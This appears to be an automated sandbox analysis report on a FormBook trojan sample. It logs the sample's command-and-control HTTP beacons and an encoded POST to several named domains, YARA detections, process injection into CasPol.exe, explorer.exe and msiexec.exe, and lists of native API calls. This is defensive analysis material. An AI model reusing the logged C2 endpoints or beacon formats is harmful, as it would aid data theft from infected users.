          Source: unknownHTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.n-r-eng.comConnection: closeContent-Length: 191Cache-Control: no-cacheOrigin: http://www.n-r-eng.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.n-r-eng.com/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 67 68 4a 35 54 3d 44 30 56 48 4d 42 42 4d 49 71 41 79 7a 4a 7e 67 54 63 42 5a 72 74 71 51 71 69 6c 78 30 71 32 37 34 4f 41 5a 70 71 68 55 41 6c 45 6c 4c 75 42 39 45 6c 43 64 67 4b 64 69 48 48 68 68 6e 6b 45 4f 56 61 71 65 4b 75 4e 59 71 48 42 5a 52 46 38 72 48 33 6d 79 7a 2d 41 30 47 52 75 67 38 4b 46 32 59 5a 38 4b 42 36 73 33 42 31 51 4a 46 41 7a 79 35 36 58 2d 77 4e 67 31 74 4f 73 50 6b 39 43 39 75 53 6d 58 73 70 6b 36 49 77 6c 73 5a 52 42 47 4c 45 4a 42 75 75 49 31 79 5a 46 37 44 46 54 4d 46 6f 4a 77 48 4d 47 54 56 6c 75 4d 74 5a 41 5f 57 43 6a 47 57 4d 6b 2e 00 00 00 00 00 00 00 00 Data Ascii: ghJ5T=D0VHMBBMIqAyzJ~gTcBZrtqQqilx0q274OAZpqhUAlElLuB9ElCdgKdiHHhhnkEOVaqeKuNYqHBZRF8rH3myz-A0GRug8KF2YZ8KB6s3B1QJFAzy56X-wNg1tOsPk9C9uSmXspk6IwlsZRBGLEJBuuI1yZF7DFTMFoJwHMGTVluMtZA_WCjGWMk.
          Source: unknownDNS traffic detected: queries for: www.laylaroseuk.com
          Source: C:\Windows\explorer.exeCode function: 3_2_05AA74F2 getaddrinfo,SleepEx,setsockopt,recv,recv,3_2_05AA74F2
          Source: global trafficHTTP traffic detected: GET /crhz/?90Z5=-8rTZKCzAmXPlO&ghJ5T=1rNCCz7kTcLTieqVkhzplJgcoI94HvPGoNH0lVnmkmFXwmlt9jZmgzPB/kdX+WOK+rGt5Wg7VkzKMCVbaV5wfyZJWCK5Z18H2VF/y4/Kognk HTTP/1.1Host: www.laylaroseuk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?ghJ5T=O29nP3ATS/5Z6K6ZOqFFpve/mTBG7paw5+pol+lVZCotPeZJEV3KnsQwBw1FpEdPbpeQCJZSqBlkKVIQIQyw8OwcFAej9bBQBYULGapVGCZ8&90Z5=-8rTZKCzAmXPlO HTTP/1.1Host: www.n-r-eng.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?90Z5=-8rTZKCzAmXPlO&ghJ5T=LNHYCELR2jrkl6ex9ablCycu9h3K7h+sZB96ERWJZAieoidRiLebg6j0RcHsFDDJ9r29OHFtYH9IplqsElTHfTI2iz39I/8+/5l0mHu4niU0 HTTP/1.1Host: www.sandpiper-apts.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?ghJ5T=4blG9eK7alfY4URLGxkOib9O4UWCECbcMJ2fHD64T+pOqyJeQKS/uT906cjCl4jdAQhvn7mHg7wgiqcNtMEnJIHJg+N9005boEqGm8iwl7o0&90Z5=-8rTZKCzAmXPlO HTTP/1.1Host: www.tf8dangky.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?90Z5=-8rTZKCzAmXPlO&ghJ5T=4Z6KAxgBWslvyWQs2zz1LTCSIJZnXz/Wr59nnN1quAvIIyJUwPyWYoHYYm82bfT5dpIzg2ZgrTpqnEgpaKo3IMTbbHn1kxCLU7tvpznsmq41 HTTP/1.1Host: www.teammart.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?ghJ5T=CCCEekJcxP1BHV4uutXMBlMorQncoYcW7RlEC0I+F0KDkaobIF+zubJ5fpyHcR0fDKGG4SO4PI1fmloML0V8WxzpJC6D/H2QJAQp0zm+InHs&90Z5=-8rTZKCzAmXPlO HTTP/1.1Host: www.suachuadienlanh247.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?90Z5=-8rTZKCzAmXPlO&ghJ5T=tmPv/9YflmeFyaovhpy86TX5rNY2iNLCfFTw46C4YL4FjsvtgGKrRmf5O7NIQw/qRR8QJqKEWoluew4y5+XfIT1Onmlscs+4wa7bdRvmZkTM HTTP/1.1Host: www.hvlandscapes.bizConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?ghJ5T=iycDOFv4tLFlCihz1M/bkpzttTI3wOwIoAcOv31GIYKsRKZ8f8EzkP6Z56SPUyztaOnMa+iauXtsUeY/SnJCIVqiEyUfq8kF6FnqNv3PiNZk&90Z5=-8rTZKCzAmXPlO HTTP/1.1Host: www.frogair.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?90Z5=-8rTZKCzAmXPlO&ghJ5T=nqmZBp2BkKhv5XD7JtliHBtb5J/nACgDXsCawcooXFLLWI2M3W+/ErAqTridlmxSnsXQQ5N94lpVUeLYPOpWHcmhsJP5m/P/TeGXz1gc+4vL HTTP/1.1Host: www.mitsubangsaen.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Windows\explorer.exeCode function: 3_2_05AA0E22 OpenClipboard,3_2_05AA0E22

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.511832982.0000000000860000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.511979263.0000000000890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.285119335.0000000000F10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 2.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.511832982.0000000000860000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.511832982.0000000000860000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.511979263.0000000000890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.511979263.0000000000890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.285119335.0000000000F10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.285119335.0000000000F10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: 2.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.511832982.0000000000860000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.511832982.0000000000860000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.511979263.0000000000890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.511979263.0000000000890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.285119335.0000000000F10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.285119335.0000000000F10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01AA09680_2_01AA0968
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01AA09780_2_01AA0978
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01AA48100_2_01AA4810
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01AA0BC00_2_01AA0BC0
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01AA0BD00_2_01AA0BD0
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01AA5E100_2_01AA5E10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_004018402_2_00401840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0040C0432_2_0040C043
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_004018372_2_00401837
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0040C03F2_2_0040C03F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_004058832_2_00405883
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_004039032_2_00403903
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_004221DD2_2_004221DD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_00401BE02_2_00401BE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_00421D3F2_2_00421D3F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_004056632_2_00405663
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_00422E292_2_00422E29
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_004206932_2_00420693
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_00421F082_2_00421F08
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_013FF9002_2_013FF900
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_014141202_2_01414120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_014B10022_2_014B1002
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0140B0902_2_0140B090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_014220A02_2_014220A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0142EBB02_2_0142EBB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_014C1D552_2_014C1D55
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_013F0D202_2_013F0D20
          Source: C:\Windows\explorer.exeCode function: 3_2_05AA2FAE3_2_05AA2FAE
          Source: C:\Windows\explorer.exeCode function: 3_2_05AA2FB23_2_05AA2FB2
          Source: C:\Windows\explorer.exeCode function: 3_2_05AA53873_2_05AA5387
          Source: C:\Windows\explorer.exeCode function: 3_2_05AA53973_2_05AA5397
          Source: C:\Windows\explorer.exeCode function: 3_2_05AA4FD73_2_05AA4FD7
          Source: C:\Windows\explorer.exeCode function: 3_2_05AA5F583_2_05AA5F58
          Source: C:\Windows\explorer.exeCode function: 3_2_05AA4D523_2_05AA4D52
          Source: C:\Windows\explorer.exeCode function: 3_2_05AA1C823_2_05AA1C82
          Source: C:\Windows\explorer.exeCode function: 3_2_05AA02903_2_05AA0290
          Source: C:\Windows\explorer.exeCode function: 3_2_05AA52073_2_05AA5207
          Source: C:\Windows\explorer.exeCode function: 3_2_05AA52123_2_05AA5212
          Source: C:\Windows\explorer.exeCode function: 3_2_05AA68123_2_05AA6812
          Source: C:\Windows\explorer.exeCode function: 3_2_05AA4E723_2_05AA4E72
          Source: C:\Windows\explorer.exeCode function: 3_2_05AA42723_2_05AA4272
          Source: C:\Windows\explorer.exeCode function: 3_2_05A9FC523_2_05A9FC52
          Source: C:\Windows\explorer.exeCode function: 3_2_0E0F52073_2_0E0F5207
          Source: C:\Windows\explorer.exeCode function: 3_2_0E0F52123_2_0E0F5212
          Source: C:\Windows\explorer.exeCode function: 3_2_0E0F68123_2_0E0F6812
          Source: C:\Windows\explorer.exeCode function: 3_2_0E0EFC523_2_0E0EFC52
          Source: C:\Windows\explorer.exeCode function: 3_2_0E0F42723_2_0E0F4272
          Source: C:\Windows\explorer.exeCode function: 3_2_0E0F4E723_2_0E0F4E72
          Source: C:\Windows\explorer.exeCode function: 3_2_0E0F1C823_2_0E0F1C82
          Source: C:\Windows\explorer.exeCode function: 3_2_0E0F02903_2_0E0F0290
          Source: C:\Windows\explorer.exeCode function: 3_2_0E0F5F583_2_0E0F5F58
          Source: C:\Windows\explorer.exeCode function: 3_2_0E0F4D523_2_0E0F4D52
          Source: C:\Windows\explorer.exeCode function: 3_2_0E0F53873_2_0E0F5387
          Source: C:\Windows\explorer.exeCode function: 3_2_0E0F53973_2_0E0F5397
          Source: C:\Windows\explorer.exeCode function: 3_2_0E0F2FAE3_2_0E0F2FAE
          Source: C:\Windows\explorer.exeCode function: 3_2_0E0F2FB23_2_0E0F2FB2
          Source: C:\Windows\explorer.exeCode function: 3_2_0E0F4FD73_2_0E0F4FD7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045DD4664_2_045DD466
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0452841F4_2_0452841F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045D10024_2_045D1002
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045E28EC4_2_045E28EC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0452B0904_2_0452B090
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045420A04_2_045420A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045E20A84_2_045E20A8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045E1D554_2_045E1D55
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0451F9004_2_0451F900
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045E2D074_2_045E2D07
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04510D204_2_04510D20
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045341204_2_04534120
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045E25DD4_2_045E25DD
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0452D5E04_2_0452D5E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045425814_2_04542581
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04536E304_2_04536E30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045E2EF74_2_045E2EF7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045E22AE4_2_045E22AE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045E2B284_2_045E2B28
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045DDBD24_2_045DDBD2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045E1FF14_2_045E1FF1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0454EBB04_2_0454EBB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_00628D804_2_00628D80
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0063E8604_2_0063E860
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_006238304_2_00623830
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_00623A504_2_00623A50
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0062A20C4_2_0062A20C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0062A2104_2_0062A210
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_00621AD04_2_00621AD0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0451B150 appears 35 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0041E593 NtCreateFile,2_2_0041E593
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0041E643 NtReadFile,2_2_0041E643
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0041E6C3 NtClose,2_2_0041E6C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0041E773 NtAllocateVirtualMemory,2_2_0041E773
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0041E58E NtCreateFile,2_2_0041E58E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0041E63D NtReadFile,2_2_0041E63D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0041E6BE NtClose,2_2_0041E6BE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0041E76D NtAllocateVirtualMemory,2_2_0041E76D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01439910 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_01439910
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_014399A0 NtCreateSection,LdrInitializeThunk,2_2_014399A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01439840 NtDelayExecution,LdrInitializeThunk,2_2_01439840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01439860 NtQuerySystemInformation,LdrInitializeThunk,2_2_01439860
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_014398F0 NtReadVirtualMemory,LdrInitializeThunk,2_2_014398F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01439A50 NtCreateFile,LdrInitializeThunk,2_2_01439A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01439A00 NtProtectVirtualMemory,LdrInitializeThunk,2_2_01439A00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01439A20 NtResumeThread,LdrInitializeThunk,2_2_01439A20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01439540 NtReadFile,LdrInitializeThunk,2_2_01439540
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_014395D0 NtClose,LdrInitializeThunk,2_2_014395D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01439710 NtQueryInformationToken,LdrInitializeThunk,2_2_01439710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01439FE0 NtCreateMutant,LdrInitializeThunk,2_2_01439FE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01439780 NtMapViewOfSection,LdrInitializeThunk,2_2_01439780
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_014397A0 NtUnmapViewOfSection,LdrInitializeThunk,2_2_014397A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01439660 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_01439660
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_014396E0 NtFreeVirtualMemory,LdrInitializeThunk,2_2_014396E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01439950 NtQueueApcThread,2_2_01439950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_014399D0 NtCreateProcessEx,2_2_014399D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0143B040 NtSuspendThread,2_2_0143B040
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01439820 NtEnumerateKey,2_2_01439820
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_014398A0 NtWriteVirtualMemory,2_2_014398A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01439B00 NtSetValueKey,2_2_01439B00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0143A3B0 NtGetContextThread,2_2_0143A3B0
